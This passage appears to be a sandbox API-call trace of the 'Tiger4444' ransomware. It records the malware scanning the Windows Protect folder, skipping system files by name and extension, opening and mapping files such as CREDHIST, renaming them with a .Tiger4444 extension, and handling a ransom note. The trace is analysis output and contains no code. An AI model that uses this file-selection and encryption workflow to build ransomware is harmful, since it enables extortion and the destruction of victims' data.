ftLastAccessTime.dwLowDateTime=0x3b7903de, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x8439f967, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.366] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.366] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.366] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.366] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.366] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.366] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8439f967, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8439f967, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8439f967, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.366] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.366] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.366] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3a5eb6e1, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a5eb6e1, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2b89fccb, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x2e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0052.366] lstrcmpiW (lpString1="CREDHIST", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.366] lstrcmpiW (lpString1="CREDHIST", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.366] lstrcmpiW (lpString1="CREDHIST", lpString2="Tiger4444.exe") returned -1 [0052.366] lstrcmpiW (lpString1="CREDHIST", lpString2=".") returned 1 [0052.366] lstrcmpiW (lpString1="CREDHIST", lpString2="..") returned 1 [0052.366] lstrcmpiW (lpString1="CREDHIST", lpString2="windows") returned -1 [0052.366] lstrcmpiW (lpString1="CREDHIST", lpString2="bootmgr") returned 1 [0052.367] lstrcmpiW (lpString1="CREDHIST", lpString2="pagefile.sys") returned -1 [0052.367] lstrcmpiW (lpString1="CREDHIST", lpString2="boot") returned 1 [0052.367] lstrcmpiW (lpString1="CREDHIST", lpString2="ids.txt") returned -1 [0052.367] lstrcmpiW (lpString1="CREDHIST", lpString2="NTUSER.DAT") returned -1 [0052.367] lstrcpyW (in: lpString1=0x30aeb0c, lpString2="CREDHIST" | out: lpString1="CREDHIST") returned="CREDHIST" [0052.367] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST", dwFileAttributes=0x22) returned 1 [0052.367] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST", dwFileAttributes=0x6) returned 1 [0052.368] lstrlenW (lpString="CREDHIST") returned 8 [0052.368] lstrlenW (lpString="Tiger4444") returned 9 [0052.368] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0052.368] lstrlenW (lpString=".dll") returned 4 [0052.368] lstrcmpiW (lpString1="HIST", lpString2=".dll") returned 1 [0052.368] lstrlenW (lpString=".lnk") returned 4 [0052.368] lstrcmpiW (lpString1="HIST", lpString2=".lnk") returned 1 [0052.368] lstrlenW (lpString=".ini") returned 4 [0052.368] lstrcmpiW (lpString1="HIST", lpString2=".ini") returned 1 [0052.368] lstrlenW (lpString=".sys") returned 4 [0052.368] lstrcmpiW (lpString1="HIST", lpString2=".sys") returned 1 [0052.368] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.368] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.368] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14382108257) returned 1 [0052.368] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=744) returned 1 [0052.368] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0052.368] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0052.368] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5f0, lpName=0x0) returned 0x2a4 [0052.369] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5f0) returned 0xbe0000 [0052.370] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.370] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0052.370] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.370] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0052.370] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.370] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0052.370] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.370] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0052.370] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14382310064) returned 1 [0052.370] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0052.370] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0052.370] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.370] CloseHandle (hObject=0x2a4) returned 1 [0052.370] CloseHandle (hObject=0x2c8) returned 1 [0052.370] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.Tiger4444") returned 68 [0052.370] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\credhist.tiger4444"), dwFlags=0x1) returned 1 [0052.371] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x5c020c86, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0x5c020c86, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0052.371] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.371] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.371] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="Tiger4444.exe") returned -1 [0052.371] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2=".") returned 1 [0052.371] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="..") returned 1 [0052.371] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="windows") returned -1 [0052.371] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="bootmgr") returned 1 [0052.371] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="pagefile.sys") returned 1 [0052.371] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="boot") returned 1 [0052.371] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="ids.txt") returned 1 [0052.371] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="NTUSER.DAT") returned 1 [0052.371] lstrcpyW (in: lpString1=0x30aeb0c, lpString2="S-1-5-21-1051304884-625712362-2192934891-1000" | out: lpString1="S-1-5-21-1051304884-625712362-2192934891-1000") returned="S-1-5-21-1051304884-625712362-2192934891-1000" [0052.371] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91628 [0052.371] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc0) returned 0xc5fd10 [0052.371] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91630 | out: ListHead=0xc66828, ListEntry=0xc91630) returned 0xc915b0 [0052.371] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44622928, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44622928, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2bc7f8fe, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0052.371] lstrcmpiW (lpString1="SYNCHIST", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.371] lstrcmpiW (lpString1="SYNCHIST", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.371] lstrcmpiW (lpString1="SYNCHIST", lpString2="Tiger4444.exe") returned -1 [0052.371] lstrcmpiW (lpString1="SYNCHIST", lpString2=".") returned 1 [0052.371] lstrcmpiW (lpString1="SYNCHIST", lpString2="..") returned 1 [0052.371] lstrcmpiW (lpString1="SYNCHIST", lpString2="windows") returned -1 [0052.371] lstrcmpiW (lpString1="SYNCHIST", lpString2="bootmgr") returned 1 [0052.371] lstrcmpiW (lpString1="SYNCHIST", lpString2="pagefile.sys") returned 1 [0052.371] lstrcmpiW (lpString1="SYNCHIST", lpString2="boot") returned 1 [0052.371] lstrcmpiW (lpString1="SYNCHIST", lpString2="ids.txt") returned 1 [0052.372] lstrcmpiW (lpString1="SYNCHIST", lpString2="NTUSER.DAT") returned 1 [0052.372] lstrcpyW (in: lpString1=0x30aeb0c, lpString2="SYNCHIST" | out: lpString1="SYNCHIST") returned="SYNCHIST" [0052.372] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST", dwFileAttributes=0x22) returned 1 [0052.372] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST", dwFileAttributes=0x6) returned 1 [0052.372] lstrlenW (lpString="SYNCHIST") returned 8 [0052.372] lstrlenW (lpString="Tiger4444") returned 9 [0052.372] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0052.372] lstrlenW (lpString=".dll") returned 4 [0052.372] lstrcmpiW (lpString1="HIST", lpString2=".dll") returned 1 [0052.372] lstrlenW (lpString=".lnk") returned 4 [0052.372] lstrcmpiW (lpString1="HIST", lpString2=".lnk") returned 1 [0052.372] lstrlenW (lpString=".ini") returned 4 [0052.372] lstrcmpiW (lpString1="HIST", lpString2=".ini") returned 1 [0052.372] lstrlenW (lpString=".sys") returned 4 [0052.373] lstrcmpiW (lpString1="HIST", lpString2=".sys") returned 1 [0052.373] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.373] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.373] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14382581141) returned 1 [0052.373] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=76) returned 1 [0052.373] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0052.373] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0052.373] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x2a4 [0052.374] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0xbe0000 [0052.375] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.375] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0052.375] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.375] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0052.375] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.375] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0052.375] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.375] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0052.375] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14382836852) returned 1 [0052.375] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0052.375] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0052.375] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.375] CloseHandle (hObject=0x2a4) returned 1 [0052.375] CloseHandle (hObject=0x2c8) returned 1 [0052.376] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.Tiger4444") returned 68 [0052.376] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\synchist"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\synchist.tiger4444"), dwFlags=0x1) returned 1 [0052.376] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44622928, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44622928, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2bc7f8fe, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0052.376] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.376] lstrcpyW (in: lpString1=0x30aeb0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.376] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.376] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.376] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.377] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.377] CloseHandle (hObject=0x2c8) returned 1 [0052.377] CloseHandle (hObject=0x2ac) returned 1 [0052.377] GetCurrentThreadId () returned 0xfa8 [0052.377] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91630 [0052.377] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000" [0052.377] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5fd10 | out: hHeap=0xc50000) returned 1 [0052.377] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91628 | out: hHeap=0xc50000) returned 1 [0052.377] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000" [0052.377] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\" [0052.377] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3" [0052.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.380] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.382] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.383] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.383] CloseHandle (hObject=0x2ac) returned 1 [0052.384] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000") returned 95 [0052.384] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.384] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x5c020c86, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0x843c5c16, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.384] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.384] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.384] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.384] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.384] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x5c020c86, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0x843c5c16, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.384] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.384] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.384] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.384] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.384] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.384] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x843c5c16, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x843c5c16, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x843ebdfe, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.384] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.384] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.384] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xb9994c1e, ftCreationTime.dwHighDateTime=0x1d38c43, ftLastAccessTime.dwLowDateTime=0xb9994c1e, ftLastAccessTime.dwHighDateTime=0x1d38c43, ftLastWriteTime.dwLowDateTime=0x2b8c6049, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="20cac00a-26e8-46c6-ab84-90a52b05e557", cAlternateFileName="20CAC0~1")) returned 1 [0052.384] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.384] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.384] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="Tiger4444.exe") returned -1 [0052.384] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2=".") returned 1 [0052.385] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="..") returned 1 [0052.385] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="windows") returned -1 [0052.385] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="bootmgr") returned -1 [0052.385] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="pagefile.sys") returned -1 [0052.385] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="boot") returned -1 [0052.385] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="ids.txt") returned -1 [0052.385] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="NTUSER.DAT") returned -1 [0052.385] lstrcpyW (in: lpString1=0x30aeb68, lpString2="20cac00a-26e8-46c6-ab84-90a52b05e557" | out: lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557") returned="20cac00a-26e8-46c6-ab84-90a52b05e557" [0052.385] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557", dwFileAttributes=0x22) returned 1 [0052.386] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557", dwFileAttributes=0x6) returned 1 [0052.386] lstrlenW (lpString="20cac00a-26e8-46c6-ab84-90a52b05e557") returned 36 [0052.386] lstrlenW (lpString="Tiger4444") returned 9 [0052.386] lstrcmpiW (lpString1="52b05e557", lpString2="Tiger4444") returned -1 [0052.386] lstrlenW (lpString=".dll") returned 4 [0052.386] lstrcmpiW (lpString1="e557", lpString2=".dll") returned 1 [0052.386] lstrlenW (lpString=".lnk") returned 4 [0052.386] lstrcmpiW (lpString1="e557", lpString2=".lnk") returned 1 [0052.386] lstrlenW (lpString=".ini") returned 4 [0052.386] lstrcmpiW (lpString1="e557", lpString2=".ini") returned 1 [0052.386] lstrlenW (lpString=".sys") 